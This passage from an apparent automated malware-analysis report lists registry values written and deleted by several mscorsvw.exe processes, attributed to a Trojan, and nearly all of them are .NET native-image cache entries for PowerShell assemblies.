"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F9"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"ConfigMask" = "4361"
"MVID" = "72 A5 E7 88 C4 07 6B 67 EC 68 97 DA DB 9C 00 B6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 03 7A F7 3D E3 F0 63 39 71 AC 16 39 CC D3 14"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"DisplayName" = "Microsoft.PowerShell.Editor,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"LastModTime" = "02 FD A4 CF 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\3d4f0e50\1a238210]
"5b" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64]
"SIG" = "EC 74 C4 48 ED 80 64 4D BD A4 D7 78 32 8C 96 D8"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "95"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3d4f0e50\1a238210\5b]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]

The process mscorsvw.exe:2432 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9F D1 16 83 88 6B 6F 3C B6 19 6C E1 54 A1 CE 2B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:3888 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\68fb5015\45ef206\b\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\3fa824d2\11\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"MVID" = "EA F7 7E C3 AE 2E A1 73 83 BF A6 FB A9 3D 37 37"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "08 B2 22 13 19 74 7F 8C EF 17 33 3B BA 64 50 A0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "97"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\1e5223d8\47f69b97]
"61" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"SIG" = "7B 5D F0 E6 43 C6 6F 48 85 FF C5 61 E9 E4 D2 1B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1e5223d8\47f69b97\61]
"DisplayName" = "Microsoft.PowerShell.GraphicalHost,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\843c933\71ae609\62]
"LastModTime" = "70 FE 85 CF 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5f]

The process mscorsvw.exe:2344 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\3fcdfaca\10\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\643db07b\27\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
"ConfigMask" = "4361"
"MVID" = "93 92 67 97 48 6D 4F 7A 9B 69 C5 87 5F F3 FC 30"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"ConfigString" = "ZAP--0000-0000"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"LastModTime" = "12 A7 3F CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\43970528\4b\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"DisplayName" = "Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\56d30baa\41c113e9\5d]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5d]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF E1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\56d30baa\41c113e9]
"5d" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 9D 61 63 15 22 8F 42 08 89 E9 C3 04 CB 0C 7B"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"SIG" = "EF D0 54 19 D0 F5 86 44 A9 62 4E 86 6A 5F 6C 6E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "93"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\40209899\66]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]

The process mscorsvw.exe:2052 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"DisplayName" = "Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"SIG" = "65 39 A0 50 E9 4F 14 4B 85 A8 07 D9 00 B9 C9 79"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index63]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\b26cbec\6f]
"LastModTime" = "A6 DC B6 CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"ConfigMask" = "4361"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"MVID" = "B1 10 6C EC A9 F5 C8 9E A5 7E 9E CD 46 C7 CF 57"
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"DisplayName" = "Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 C2 C9 EF 83 00 0A 13 02 1F 7D 5F F5 87 88 AA"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\34cea914\1285f653\67]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "99"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"LastModTime" = "46 02 DD CB 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\34cea914\1285f653]
"67" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\77ef485c\70]
"SIG" = "EC D0 CD 16 68 09 9B 47 85 11 78 36 0F BB 3D 11"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FF C1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index61]

The process mscorsvw.exe:2056 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BE 3A 12 D4 D2 09 6C 5B C9 5A A3 0D 31 82 9B 6B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:1612 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "40 8A 05 CC 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "7E 71 C8 CA 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1D 08 E4 C9 0B 11 10 4B A3 EF 9C 23 A6 EC 54 AD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"

